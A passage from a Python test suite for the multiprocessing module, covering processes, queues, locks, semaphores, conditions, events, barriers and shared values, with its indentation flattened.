self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
